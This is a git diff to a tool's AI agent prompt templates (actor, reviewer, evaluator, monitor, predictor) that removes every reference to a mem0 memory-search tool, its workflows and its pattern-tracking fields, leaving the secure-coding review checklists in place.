## Bash Command Guidelines diff --git a/src/mapify_cli/templates/agents/actor.md b/src/mapify_cli/templates/agents/actor.md index 97fa53e..7ec0a71 100644 --- a/src/mapify_cli/templates/agents/actor.md +++ b/src/mapify_cli/templates/agents/actor.md @@ -12,10 +12,9 @@ last_updated: 2025-11-27 ┌─────────────────────────────────────────────────────────────────────┐ │ ACTOR AGENT PROTOCOL │ ├─────────────────────────────────────────────────────────────────────┤ -│ 1. mcp__mem0__map_tiered_search → BEFORE any implementation │ -│ 2. Implement complete code → No placeholders, no ellipsis │ -│ 3. Handle ALL errors → Explicit try/catch, no silent fails │ -│ 4. Document trade-offs → Alternatives considered, why chosen │ +│ 1. Implement complete code → No placeholders, no ellipsis │ +│ 2. Handle ALL errors → Explicit try/catch, no silent fails │ +│ 3. Document trade-offs → Alternatives considered, why chosen │ ├─────────────────────────────────────────────────────────────────────┤ │ REQUIRED: Use Edit/Write tools to apply code directly │ │ NEVER: Modify outside {{allowed_scope}} | Skip error handling │ @@ -82,20 +81,9 @@ This enables Synthesizer to extract and resolve decisions across variants. # MCP Tool Integration (Single Source of Truth) -## Mandatory Tools (Every Implementation) - -### 1. mcp__mem0__map_tiered_search — BEFORE Implementation -**Purpose**: Learn from past solutions, avoid repeating mistakes -**When**: ALWAYS, even for simple tasks -**Query Format**: `"[technology] [feature] implementation"` or `"[error type] solution"` - -**Note**: Actors no longer store patterns directly. After Monitor approval, run `/map-learn` to trigger Reflector → Curator → mem0 storage. - ---- - ## Research Tools (Optional — Use When Knowledge Gap Exists) -**Decision Rule**: Use if unfamiliar library/algorithm/architecture. Skip if existing patterns cover it. +**Decision Rule**: Use if unfamiliar library/algorithm/architecture. 
| Trigger | Tool | Purpose | |---------|------|---------| @@ -105,13 +93,7 @@ This enables Synthesizer to extract and resolve decisions across variants. ### Tool Selection Flowchart ``` -START → mcp__mem0__map_tiered_search (ALWAYS) - ↓ -Found relevant pattern in mem0? - YES → Apply pattern, implement - NO → Continue research - ↓ -Using external library? +START → Using external library? YES → context7: resolve-library-id → get-library-docs NO → Continue ↓ @@ -130,40 +112,6 @@ Monitor will validate written code ## Handling MCP Tool Responses -### mcp__mem0__map_tiered_search Results - -**Re-rank retrieved patterns** before use: -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.domain matches subtask_domain: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.created_at > (now - 30_days): relevance_score += 1 - IF pattern.metadata.validated == true: relevance_score += 1 - IF abs(pattern.complexity - subtask.complexity) <= 2: relevance_score += 1 - -SORT by relevance_score DESC -USE top 3 patterns (discard low-relevance noise) -``` - -**Multiple patterns found**: -- Apply re-ranking algorithm above -- Prefer highest relevance_score (not just most recent) -- Prefer patterns marked "validated" or "production" -- Document selection rationale in Trade-offs - -**Conflicting patterns**: -```yaml -conflict: "Pattern A says X, Pattern B says Y" -resolution: "Using Pattern A (higher relevance score: domain match + validated)" -action: "Document conflict in Trade-offs for Monitor review" -``` - -**Empty results**: -- Document: "No similar patterns in mem0. Novel implementation." 
-- Increase test coverage for unvalidated approach -- Flag in Trade-offs for extra Monitor scrutiny - ### context7 / deepwiki Results **Unclear or incomplete docs**: @@ -183,16 +131,9 @@ mitigation: "Added version check, comprehensive tests" **Library Implementation**: ``` -mcp__mem0__map_tiered_search("[library] implementation") - → (if no patterns) context7: get-library-docs +context7: get-library-docs → (if architecture unclear) deepwiki: ask_question - → implement → /map-learn (after approval) -``` - -**Algorithm Implementation**: -``` -mcp__mem0__map_tiered_search("[algorithm] implementation") - → review, adapt, test → /map-learn (after approval) + → implement ``` --- @@ -203,18 +144,8 @@ When multiple sources provide conflicting guidance, follow this priority (highes 1. **Explicit human instruction** in subtask description 2. **Security constraints** (NEVER override) -3. **mem0 patterns** (validated past patterns from tiered search) -4. **Research tools** (context7, deepwiki) -5. **Training data** (fallback) - -**Example conflict resolution**: -```yaml -conflict: - mem0_pattern_1: "Use polling for real-time updates" - mem0_pattern_2: "Use webhooks for real-time updates" -resolution: "Using pattern with higher relevance score and more recent validation" -action: "Document in Trade-offs for Monitor review" -``` +3. **Research tools** (context7, deepwiki) +4. **Training data** (fallback) @@ -262,8 +193,7 @@ Task( ## Skip Research If - Task is self-contained (new file, no dependencies) -- mem0 already has the pattern you need -- mcp__mem0__map_tiered_search returned sufficient context +- Existing patterns from context already cover the need --- @@ -309,7 +239,7 @@ Explain solution strategy in 2-3 sentences. Include: - MCP tools used and what they informed (if any) -"Implementing rate limiting using token bucket algorithm. mcp__mem0__map_tiered_search found similar pattern (impl-0089) for Redis-based limiting. Adapted for in-memory use per requirements." 
+"Implementing rate limiting using token bucket algorithm. Adapted standard Redis-based limiting pattern for in-memory use per requirements." ## 3. Code Changes @@ -407,18 +337,7 @@ VC1: - Tests: path/to/test_file.ext::test_name (or N/A with reason) ``` -## 7. Used Patterns (ACE Learning) - -**Format**: `["impl-0012", "sec-0034"]` or `[]` if none - -**How to identify pattern IDs**: -- Scan `{{existing_patterns}}` for your subtask's domain -- Note IDs you actually referenced during implementation -- Format in mem0: `[impl-0042] Description: ...` - -**If no patterns match**: `[]` with note "No relevant patterns in current mem0" - -## 8. Integration Notes (If Applicable) +## 7. Integration Notes (If Applicable) Only include if changes affect: - Database schema (migrations needed?) @@ -456,8 +375,7 @@ Only include if changes affect: - [ ] **Dependencies**: Known vulnerabilities checked (if new deps) ### MCP Compliance -- [ ] mcp__mem0__map_tiered_search called before implementation -- [ ] Research tools used if knowledge gap existed +- [ ] Research tools used if knowledge gap existed (context7, deepwiki) - [ ] Fallback documented if tools unavailable ### Output Completeness @@ -465,7 +383,6 @@ Only include if changes affect: - [ ] Trade-offs documented with alternatives - [ ] Test cases cover happy + edge + error paths - [ ] Each `validation_criteria` item has at least one automated test (or explicit N/A with reason) -- [ ] Used patterns tracked (or `[]` if none) - [ ] Template variables `{{...}}` preserved in generated code ### SFT Comfort Zone (Token Discipline) @@ -632,17 +549,6 @@ output: default: "Will implement read-through unless directed otherwise" ``` -## When mem0 Patterns Conflict - -```yaml -output: - status: PATTERN_CONFLICT - bullets: ["impl-0012", "impl-0089"] - conflict: "impl-0012 recommends polling, impl-0089 recommends webhooks" - analysis: "impl-0089 is newer, has better rationale for real-time needs" - resolution: "Using impl-0089 pattern - please 
confirm or override" -``` - ## When Implementation Exceeds Scope **Target**: 50-300 lines per subtask @@ -680,15 +586,14 @@ output: # for the completed portions ``` -## When All Tools Unavailable (Degraded Mode) +## When All Research Tools Unavailable (Degraded Mode) -If mcp__mem0__map_tiered_search AND research tools all fail: +If all research tools fail: ```yaml output: status: DEGRADED_MODE limitations: - - "mcp__mem0__map_tiered_search: timeout after 3 attempts" - "context7: service unavailable" - "deepwiki: connection refused" confidence: LOW @@ -751,30 +656,6 @@ Focus on: - - - -## Available Patterns (ACE Learning) - -{{#if existing_patterns}} - -**How to read pattern IDs**: `[category-NNNN]` where category = impl|sec|test|perf|arch|err - -{{existing_patterns}} - -**Usage**: -1. Identify relevant patterns by domain/technology -2. Apply patterns directly (adapt, don't copy) -3. Track applied pattern IDs in "Used Patterns" section - -{{/if}} - -{{#unless existing_patterns}} -*No patterns available yet. Your implementation will seed mem0 via /map-learn. Be extra thorough.* -{{/unless}} - - - --- # ===== REFERENCE MATERIAL ===== @@ -862,7 +743,7 @@ Default: **Subtask**: "Create user registration endpoint" -**Approach**: POST /api/register with email/password validation, bcrypt hashing, JWT response. mcp__mem0__map_tiered_search found sec-0012 (password hashing) and impl-0034 (validation patterns). +**Approach**: POST /api/register with email/password validation, bcrypt hashing, JWT response. Using standard password hashing and validation patterns. **Code Changes**: @@ -933,7 +814,6 @@ def register(): 6. test_register_sql_injection_safe 7. test_register_token_decodes_correctly -**Used Patterns**: `["sec-0012", "impl-0034"]` --- @@ -941,7 +821,7 @@ def register(): **Subtask**: "Add rate limiting to existing API endpoint" -**Approach**: Token bucket rate limiting using existing Redis connection. 100 req/min per IP. 
mcp__mem0__map_tiered_search found impl-0089 (Redis patterns). +**Approach**: Token bucket rate limiting using existing Redis connection. 100 req/min per IP. Using standard Redis rate limiting patterns. **Code Changes**: @@ -1022,7 +902,6 @@ def get_data(): 4. test_rate_limit_per_ip_isolation 5. test_rate_limit_headers_present -**Used Patterns**: `["impl-0089"]` --- @@ -1058,7 +937,7 @@ recommendation: "Option 1 - clean solution worth scope expansion" **Subtask**: "Implement WebSocket reconnection logic" -**Approach**: Exponential backoff reconnection. mcp__mem0__map_tiered_search empty. context7 timed out. Implemented standard pattern with documented fallback. +**Approach**: Exponential backoff reconnection. context7 timed out. Implemented standard pattern with documented fallback. **Code Changes**: ```typescript @@ -1107,6 +986,4 @@ export class ReconnectingWebSocket { 3. test_reconnect_max_attempts_triggers_callback 4. test_reconnect_handles_immediate_disconnect -**Used Bullets**: `[]` (No similar patterns in mem0. Novel implementation.) - diff --git a/src/mapify_cli/templates/agents/documentation-reviewer.md b/src/mapify_cli/templates/agents/documentation-reviewer.md index 932dc07..90417c3 100644 --- a/src/mapify_cli/templates/agents/documentation-reviewer.md +++ b/src/mapify_cli/templates/agents/documentation-reviewer.md @@ -119,11 +119,6 @@ ELSE: → Use Fetch + manual README.md analysis → Log: "deepwiki unavailable, architecture analysis limited" -IF mcp__mem0__* available: - → Use for historical pattern matching -ELSE: - → Skip pattern matching, rely on explicit checks only - → Log: "mem0 unavailable, no historical context" ``` ## Fallback Protocol @@ -441,12 +436,6 @@ mcp__deepwiki__ask_question( question="How does Gatekeeper handle CRD installation?" ) -# 4. 
Check historical patterns (if mem0 available) -mcp__mem0__map_tiered_search( - query="CRD installation documentation patterns", - limit=5, - similarity_threshold=0.7 -) ``` --- @@ -709,14 +698,6 @@ mcp__mem0__map_tiered_search( **Documentation to Review**: {{subtask_description}} -{{#if existing_patterns}} -## Relevant mem0 Knowledge - -{{existing_patterns}} - -**Use these patterns** to identify common documentation issues and prioritize checks. -{{/if}} - {{#if feedback}} ## Previous Review Feedback diff --git a/src/mapify_cli/templates/agents/evaluator.md b/src/mapify_cli/templates/agents/evaluator.md index 96a098b..5bc965a 100644 --- a/src/mapify_cli/templates/agents/evaluator.md +++ b/src/mapify_cli/templates/agents/evaluator.md @@ -257,13 +257,6 @@ Scoring Context Decision: ALWAYS: → sequentialthinking (systematic quality analysis: break down dimensions, evaluate trade-offs, ensure consistency) -IF complex architectural decisions: - → mcp__mem0__map_tiered_search: "quality metrics [feature]", "performance benchmark [op]", "best practice score [tech]" - -IF learning from past evaluation reasoning: - → mcp__mem0__map_tiered_search: "quality assessment for [feature]", "scoring rationale [pattern]" - → Understand WHY past implementations scored high/low, apply reasoning - IF previous implementations exist: → get_review_history (compare solutions, learn from past issues, maintain scoring consistency) @@ -436,17 +429,12 @@ Thought 7: Generate recommendation with research feedback **Use When**: Check consistency with past implementations **Rationale**: Maintain consistent standards (e.g., if past testability scored 8/10, use same criteria). Prevents score inflation/deflation. -### 3. 
mcp__mem0__map_tiered_search -**Use When**: Need quality benchmarks/best practices from memory -**Queries**: `"quality metrics [feature]"`, `"performance benchmark [op]"`, `"best practice score [tech]"`, `"test coverage standard [component]"` -**Rationale**: Quality is relative—DB query performance ≠ API performance. Mem0 provides domain-specific baselines from stored patterns. - -### 4. mcp__context7__get-library-docs +### 3. mcp__context7__get-library-docs **Use When**: Solution uses external libraries/frameworks **Process**: `resolve-library-id` → `get-library-docs(topics: best-practices, performance, security, testing)` **Rationale**: Libraries define quality standards (React testing, Django security). Validate solutions follow these. -### 5. mcp__deepwiki__ask_question +### 4. mcp__deepwiki__ask_question **Use When**: Need industry standard comparisons **Queries**: "What metrics does [repo] use for [feature]?", "How do top projects test [feature]?", "Performance benchmarks for [op]?" **Rationale**: Learn from production code. If top projects achieve 90% auth coverage, that's a valid benchmark. @@ -454,7 +442,6 @@ Thought 7: Generate recommendation with research feedback **IMPORTANT**: - ALWAYS use sequential thinking for complex analysis -- Search mem0 for domain-specific benchmarks - Get review history to maintain consistency - Validate against library best practices - Document which MCP tools informed scores @@ -817,7 +804,6 @@ SCORING CONSISTENCY VALIDATION: → Checked existing_patterns for similar implementations → Compared against scoring rubric thresholds (8-9 = meets all, 6-7 = meets core) → Considered project conventions ({{language}}, {{framework}} best practices) - → Used mcp__mem0__map_tiered_search to find similar past evaluations for calibration → NOT scoring in isolation without context [ ] **4. Consistency with Criteria** - Do my scores map to the published scoring rubric? @@ -852,7 +838,6 @@ SCORING CONSISTENCY VALIDATION: [ ] **8. 
Comparative Context** - Did I explain if this score is typical/atypical for the subtask type? → Noted if score is above/below average for similar subtasks → Explained why unusually high/low scores occurred - → Referenced past implementations if available (mem0 search) → Provided context: "8/10 is typical for CRUD features" vs "8/10 is exceptional for complex algorithm" → NOT scoring without explaining relative performance @@ -874,9 +859,9 @@ SCORING CONSISTENCY VALIDATION: **Why This Checklist Matters**: -Evaluator is the **final quality gate** before Reflector/Curator learning begins. Inconsistent scoring pollutes downstream processes: +Evaluator is the **final quality gate** before downstream processes. Inconsistent scoring pollutes workflow: -1. **Inconsistent scores** → Curator can't trust helpful_count thresholds → memory quality degrades +1. **Inconsistent scores** → Downstream agents cannot trust evaluation signals 2. **False positives** → Actor wastes iteration cycles on non-issues → workflow stalls 3. **Missing dimensions** → Critical gaps (security, performance) overlooked → production failures 4. **Vague justifications** → Actor doesn't understand what to improve → repeats mistakes @@ -885,7 +870,6 @@ Each checklist item prevents a specific failure mode. Systematic validation ensu - **Scoring consistency** across subtasks (same code quality → same score) - **Evidence-based decisions** (not gut feelings) - **Clear feedback** for Actor (actionable improvements) -- **Trustworthy signals** for Curator (reliable helpful_count) @@ -939,7 +923,7 @@ Output MUST be valid JSON. Orchestrator parses this programmatically. 
Invalid JS "next_steps": [ "Concrete action to improve (if recommendation != 'proceed')" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1208,7 +1192,7 @@ def calculate_user_discount( "completeness": "9/10 - Very complete: code, tests, comprehensive docs, error handling, logging. Missing 1 point: no deployment notes or performance benchmarks." }, "next_steps": [], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1261,7 +1245,7 @@ def calculate_user_discount( "Add type hints and docstring", "Add structured logging for debugging" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search", "get-library-docs"] + "mcp_tools_used": ["sequentialthinking", "get-library-docs"] } ``` @@ -1317,7 +1301,7 @@ def calculate_user_discount( "Add structured logging for debugging and monitoring", "Add docstrings and type hints throughout" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1374,7 +1358,7 @@ def calculate_user_discount( "Add comprehensive authorization tests", "Document security considerations in API docs" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1439,7 +1423,7 @@ def calculate_user_discount( "Add extensive tests including: successful payment, declined card, timeout, network failure, duplicate prevention", "Consider using payment SDK instead of raw API calls for built-in security" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search", "get-library-docs", "deepwiki"] + "mcp_tools_used": ["sequentialthinking", "get-library-docs", "deepwiki"] } ``` @@ -1453,8 +1437,7 @@ def calculate_user_discount( **Before returning your evaluation JSON:** 1. ✅ Did I use sequential thinking for quality analysis? -2. 
✅ Did I search mem0 for quality benchmarks relevant to this feature? -3. ✅ Did I check review history for consistency with past scores? +2. ✅ Did I check review history for consistency with past scores? 4. ✅ Are all scores (0-10) justified with specific evidence? 5. ✅ Is overall_score calculated correctly using weighted formula? 6. ✅ Is recommendation based on decision tree logic? diff --git a/src/mapify_cli/templates/agents/monitor.md b/src/mapify_cli/templates/agents/monitor.md index 807ef53..a4ed12f 100644 --- a/src/mapify_cli/templates/agents/monitor.md +++ b/src/mapify_cli/templates/agents/monitor.md @@ -276,8 +276,6 @@ IF code uses external libraries: → Run resolve-library-id + get-library-docs IF complex logic detected (≥3 nested conditionals, state machines, async): → Run sequentialthinking with structured thoughts -IF similar code reviewed before: - → Run mcp__mem0__map_tiered_search with pattern query IF detected_language != "unknown": → Consider language-specific static analysis tools @@ -445,13 +443,13 @@ IF Actor disputes a finding: ### Pattern Conflict Resolution ```text -IF mem0 pattern conflicts with dimension requirement: +IF learned pattern conflicts with dimension requirement: → Security/Correctness dimensions WIN (non-negotiable) - → Code-quality/Style dimensions: mem0 pattern wins + → Code-quality/Style dimensions: learned pattern wins → Document conflict in feedback_for_actor Example: - mem0 pattern: "Allow single-letter vars in list comprehensions" + Learned pattern: "Allow single-letter vars in list comprehensions" Dimension 3: "Clear naming required" → Allow 'x' in: [x*2 for x in items] → Block 'x' in: def calculate(x, y, z) @@ -467,7 +465,7 @@ Example: **CRITICAL**: Comprehensive code review requires multiple perspectives. Use ALL relevant MCP tools to catch issues that single-pass review might miss. -Code review quality directly impacts production stability. 
MCP tools provide: (1) professional AI review baseline, (2) historical pattern matching for known issues, (3) library-specific best practices, (4) industry standard comparisons. Using these tools catches 3-5x more issues than manual review alone. +Code review quality directly impacts production stability. MCP tools provide: (1) professional AI review baseline, (2) library-specific best practices, (3) industry standard comparisons. Using these tools catches 3-5x more issues than manual review alone. ### Tool Selection Decision Framework @@ -476,16 +474,16 @@ Code review quality directly impacts production stability. MCP tools provide: (1 Review Scope Decision: Implementation Code: - → request_review (AI baseline) → mcp__mem0__map_tiered_search (known patterns) + → request_review (AI baseline) → get-library-docs (external libs) → sequentialthinking (complex logic) → deepwiki (security patterns) Documentation: → Glob/Read (find source of truth) → Fetch (validate URLs) - → mcp__mem0__map_tiered_search (anti-patterns) → ESCALATE if inconsistent + → ESCALATE if inconsistent Test Code: - → mcp__mem0__map_tiered_search (test patterns) → get-library-docs (framework practices) + → get-library-docs (framework practices) → Verify coverage expectations ``` @@ -503,25 +501,7 @@ request_review({ }) ``` -### 2. 
mcp__mem0__map_tiered_search -**Use When**: Check known issues/anti-patterns from memory -**Parameters**: `query` (search string), `category` (optional filter) -**Queries**: `"code review issue [pattern]"`, `"security vulnerability [code]"`, `"anti-pattern [tech]"`, `"test anti-pattern [type]"` -**Rationale**: Past issues repeat—prevent regressions by searching learned patterns - -**Re-rank results** by relevance to current review: -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.category matches review_dimension: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.severity in {critical, high}: relevance_score += 1 - IF pattern.validated == true: relevance_score += 1 -SORT by relevance_score DESC -USE top 3 patterns for issue detection -``` - -### 3. mcp__sequential-thinking__sequentialthinking +### 2. mcp__sequential-thinking__sequentialthinking **Use When**: Complex logic requiring systematic trace (see triggers below) **Complexity Triggers** (use sequentialthinking if ANY apply): @@ -542,18 +522,18 @@ Thought N+1: Check for unreachable code or logic gaps Conclusion: List issues found with line numbers ``` -### 4. mcp__context7__get-library-docs +### 3. mcp__context7__get-library-docs **Use When**: Code uses external libraries/frameworks **Process**: `resolve-library-id` → `get-library-docs(library_id, topic)` **Topics**: best-practices, security, error-handling, performance, deprecated-apis **Rationale**: Current docs prevent deprecated APIs and missing security features -### 5. mcp__deepwiki__ask_question +### 4. mcp__deepwiki__ask_question **Use When**: Validate security/architecture patterns **Queries**: "How does [repo] handle [concern]?", "Common mistakes in [feature]?" **Rationale**: Learn from battle-tested production code -### 6. Fetch Tool (Documentation Review Only) +### 5. 
Fetch Tool (Documentation Review Only) **Use When**: Reviewing documentation that mentions external projects/URLs **Process**: Extract URLs → Fetch each → Verify dependencies documented **Rationale**: External integrations have hidden dependencies (CRDs, adapters) @@ -561,7 +541,6 @@ Conclusion: List issues found with line numbers **IMPORTANT**: - Use request_review FIRST for all code reviews -- Always search mem0 for known patterns before marking valid - Get current library docs for ANY external library used - Use sequential thinking for complex logic validation - Document which MCP tools you used in your review summary @@ -574,7 +553,6 @@ Conclusion: List issues found with line numbers Tool | Timeout | Action on Timeout ------------------------|---------|---------------------------------- request_review | 5 min | Proceed to manual 10-dimension review -map_tiered_search | 2 min | Skip, note in summary, proceed sequentialthinking | 5 min | Manual trace critical paths get-library-docs | 3 min | Use deepwiki or Fetch as fallback deepwiki | 3 min | Skip pattern validation, proceed @@ -596,11 +574,6 @@ IF request_review fails or times out (>5 min): → Note "MCP baseline unavailable" in summary → Apply extra scrutiny to security dimension -IF map_tiered_search returns empty results: - → This is NORMAL for new codebases or novel patterns - → Do NOT treat as blocking - → Proceed with standard review - IF get-library-docs unavailable or library not indexed: → Use deepwiki to search for library patterns → Use Fetch for official documentation URLs @@ -628,7 +601,6 @@ Priority 1: Manual Review (human-level logic) → Trust tools for SYNTAX errors, type mismatches, style violations Priority 2: Security-focused tools - → map_tiered_search (known vulnerabilities) > request_review (general) → deepwiki (production patterns) > get-library-docs (generic docs) Priority 3: Specificity @@ -656,7 +628,6 @@ Priority 4: Severity | Short Name | Full MCP Name | Category | 
|------------|---------------|----------| | `request_review` | `mcp__claude-reviewer__request_review` | AI Review | -| `map_tiered_search` | `mcp__mem0__map_tiered_search` | Knowledge | | `sequentialthinking` | `mcp__sequential-thinking__sequentialthinking` | Analysis | | `get_library_docs` | `mcp__context7__get-library-docs` | Docs | | `resolve_library_id` | `mcp__context7__resolve-library-id` | Docs | @@ -692,28 +663,6 @@ Priority 4: Severity **Key Fields**: `findings[].line`, `findings[].severity`, `findings[].message` **Integration**: Convert each finding to Monitor issue format, map type→category -#### map_tiered_search Response -```json -{ - "results": [ - { - "id": "mem-uuid", - "memory": "Pattern: Always validate JWT expiry before processing", - "score": 0.95, - "metadata": { - "category": "security", - "source": "auth-service", - "created_at": "2024-01-15T10:30:00Z" - } - } - ], - "total": 3, - "query": "JWT validation patterns" -} -``` -**Key Fields**: `results[].memory`, `results[].score` (>0.8 = highly relevant) -**Integration**: Empty results is NORMAL for new codebases - proceed without error - #### sequentialthinking Response ```json { @@ -965,8 +914,7 @@ def divide(a, b): 2. Verify parameterized queries (no string interpolation) 3. Check command execution (no shell=True with user input) 4. Validate file paths (no path traversal) -5. Search mem0 for known vulnerabilities: `"security vulnerability [language]"` -6. Use deepwiki to check production security patterns +5. 
Use deepwiki to check production security patterns #### Pass Criteria - All inputs validated with allowlist approach @@ -1401,7 +1349,7 @@ ELSE: ``` **Research Triggers**: React, Next.js, Django, FastAPI, rate limiting, webhook handling, distributed systems -**Valid Skips**: Pattern in mem0, language primitives only, deep expertise, first principles +**Valid Skips**: Language primitives only, deep expertise, first principles **DO NOT block** for missing research if: @@ -1551,7 +1499,7 @@ Before returning JSON, verify: "failed_checks": [], "feedback_for_actor": "Implementation is solid. No changes required.", "estimated_fix_time": "5 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -1666,7 +1614,7 @@ Do NOT invent issues to justify review effort. Empty `issues` array is valid. "type": "array", "items": { "type": "string", - "enum": ["request_review", "map_tiered_search", "map_add_pattern", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] + "enum": ["request_review", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] }, "description": "MCP tools successfully used during review" }, @@ -1674,7 +1622,7 @@ Do NOT invent issues to justify review effort. Empty `issues` array is valid. 
"type": "array", "items": { "type": "string", - "enum": ["request_review", "map_tiered_search", "map_add_pattern", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] + "enum": ["request_review", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] }, "description": "MCP tools that failed or timed out" }, @@ -1821,7 +1769,7 @@ IF map-planning workflow active AND valid === true: "failed_checks": ["testability", "documentation"], "feedback_for_actor": "Actionable guidance with specific steps (reference dimensions: 'Security dimension failed: add input validation' or 'Dimension 2 (Security): missing rate limiting')", "estimated_fix_time": "5 minutes|30 minutes|2 hours|4 hours", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -2146,9 +2094,6 @@ IF ≥3 MCP tools fail in sequence: |------|--------------|-----------------| | `request_review` | Timeout (>5min) | Skip AI baseline, proceed with full 10-dimension manual review | | `request_review` | Error response | Log error, proceed with manual review, note limitation | -| `map_tiered_search` | Empty results | Normal for new code - proceed, no fallback needed | -| `map_tiered_search` | Timeout | Skip pattern matching, proceed with standard review | -| `map_tiered_search` | Error | Skip impact analysis, note in feedback | | `sequentialthinking` | Quota exceeded | Manual trace critical paths, recommend human review | | `get_library_docs` | Library not indexed | Try deepwiki → Fetch docs URL → note limitation | | `deepwiki` | Timeout | Skip pattern validation, proceed with conservative review | @@ -2177,7 +2122,7 @@ IF Manual Only mode: "summary": "Manual review completed - MCP tools unavailable", "issues": [...], "mcp_tools_used": [], - "mcp_tools_failed": ["request_review", "map_tiered_search", "sequentialthinking"], + "mcp_tools_failed": ["request_review", 
"sequentialthinking"], "recovery_mode": "manual_only", "recovery_notes": "3+ tool failures triggered manual-only review. Extra scrutiny applied to Security and Correctness dimensions.", "feedback_for_actor": "Note: This review was performed without AI baseline (tool failures). Consider requesting a follow-up review when tools are available for security-critical sections." @@ -2193,9 +2138,9 @@ IF tool returns partial results (truncated, incomplete): → Do NOT treat as full failure → Supplement with manual review for gaps -Example: map_tiered_search returns 3 of expected 10 results - → Use the 3 results - → Note: "Pattern search returned partial results" +Example: A tool returns partial results (3 of expected 10) + → Use the available results + → Note: "Tool returned partial results" → Manually check for common patterns not in results ``` @@ -2247,7 +2192,7 @@ After each review, the orchestrator should log: "duration_seconds": 180, "loc_reviewed": 450, "language": "python", - "tools_used": ["request_review", "map_tiered_search"], + "tools_used": ["request_review"], "tools_failed": [], "issues_found": {"critical": 0, "high": 2, "medium": 5, "low": 1}, "valid": true, @@ -2266,7 +2211,7 @@ IF false positive rate >15%: IF bug catch rate <70%: → Expand dimension checklists → Add more MCP tool triggers - → Review missed patterns, add to mem0 + → Review missed patterns, document for future reference IF review time consistently >target: → Optimize tool selection @@ -2349,7 +2294,7 @@ IF review time consistently >target: "failed_checks": ["correctness", "security", "testability"], "feedback_for_actor": "Add validation, email check, db error handling, tests. 
Start with missing field validation (HIGH), then add security checks.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -2394,7 +2339,7 @@ def search_users(query): "failed_checks": ["security", "correctness"], "feedback_for_actor": "CRITICAL: SQL injection vulnerability allows arbitrary database access. MUST fix before deployment. Use parameterized queries (see suggestion). Also add input validation for query length.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search", "deepwiki"] + "mcp_tools_used": ["request_review", "deepwiki"] } ``` @@ -2431,7 +2376,7 @@ def search_users(query): "failed_checks": ["documentation"], "feedback_for_actor": "Read tech-design.md:145-160 for correct trigger syntax. Use 'engines: {}' not 'presets: []'. Add both disable scenarios (global and per-engine).", "estimated_fix_time": "2 hours", - "mcp_tools_used": ["Glob", "Read", "map_tiered_search"] + "mcp_tools_used": ["Glob", "Read"] } ``` @@ -2439,7 +2384,7 @@ def search_users(query): ### Example 4: Edge Case - MCP Tools Unavailable -**Scenario**: request_review times out, map_tiered_search returns empty +**Scenario**: request_review times out, other tools unavailable **Code**: ```python @@ -2486,7 +2431,7 @@ def check_rate_limit(user_id, action, limit=100, window=3600): "failed_checks": ["correctness", "performance", "testability"], "feedback_for_actor": "Note: MCP baseline review unavailable (timeout). Manual review identified race condition in rate limiter - use Redis pipeline or Lua script for atomic incr+expire. Add Redis connection error handling. 
Consider dependency injection for testability.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review (timeout)", "map_tiered_search (no results)"] + "mcp_tools_used": ["request_review (timeout)"] } ``` @@ -2500,7 +2445,7 @@ def check_rate_limit(user_id, action, limit=100, window=3600): **Before returning your review JSON:** 1. ✅ Did I use request_review for code implementations? -2. ✅ Did I search mem0 for known issue patterns? +2. ✅ Did I check for known issue patterns? 3. ✅ Did I check all 10 validation dimensions systematically? 4. ✅ Did I verify documentation against source of truth (if applicable)? 5. ✅ Are all issues specific with location and actionable suggestions? diff --git a/src/mapify_cli/templates/agents/predictor.md b/src/mapify_cli/templates/agents/predictor.md index 5261e76..920718d 100644 --- a/src/mapify_cli/templates/agents/predictor.md +++ b/src/mapify_cli/templates/agents/predictor.md @@ -47,14 +47,7 @@ IF analyzer_output provided → Cross-reference affected files ### Core Analysis Tools -**1. mem0 (Tiered Memory Search)** -- **Purpose**: Find historical patterns and past analyses using tiered memory search -- **Capabilities**: - - `mcp__mem0__map_tiered_search`: Search for patterns with tiered retrieval (L1 recent → L2 frequent → L3 semantic) -- **Best for**: Finding similar past changes, historical impact analyses, migration patterns -- **Fallback if unavailable**: grep - -**2. grep (Fast Text Search)** +**1. grep (Fast Text Search)** - **Purpose**: Pattern matching across repository files - **Always available**: Yes (baseline tool) - **Capabilities**: @@ -75,14 +68,12 @@ TIER 1 (Minimal - 30 sec): - Symbol usage: grep -r "{function_name}" --include="*.py" TIER 2 (Standard - 1-2 min): - ├── 1. mcp__mem0__map_tiered_search (historical patterns) - └── 2. grep (dependency analysis + verification) + └── grep (dependency analysis + verification) - Sequential execution - Cross-validate results TIER 3 (Deep - 3-5 min): - ├── 1. 
